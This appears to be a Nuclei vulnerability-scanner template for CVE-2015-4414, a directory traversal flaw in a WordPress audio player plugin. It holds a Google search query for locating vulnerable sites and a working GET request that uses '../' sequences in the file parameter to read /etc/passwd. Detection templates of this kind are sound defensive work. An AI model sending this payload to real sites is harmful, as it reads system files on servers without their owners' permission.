nuclei-templates/http/cves/2015/CVE-2015-4414.yaml

46 lines
1.7 KiB
YAML

id: CVE-2015-4414
info:
name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
author: daffainfo
severity: medium
description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
remediation: |
Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability.
reference:
- https://www.exploit-db.com/exploits/37274
- https://nvd.nist.gov/vuln/detail/CVE-2015-4414
- https://www.exploit-db.com/exploits/37274/
- http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html
- https://wpvulndb.com/vulnerabilities/8032
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2015-4414
cwe-id: CWE-22
epss-score: 0.11221
epss-percentile: 0.94441
cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: se_html5_album_audio_player_project
product: se_html5_album_audio_player
framework: wordpress
google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player"
tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200